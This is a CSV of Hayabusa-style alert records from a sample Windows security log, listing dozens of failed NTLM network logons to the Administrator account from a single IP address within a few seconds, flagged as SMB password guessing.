2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZFXBpUJzafGYIggt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MC1K9nNLupH0NuSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rVfBLm10US9II19 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SBhAVHHtR7lZ1C3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKuUH8lMELYHibxF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
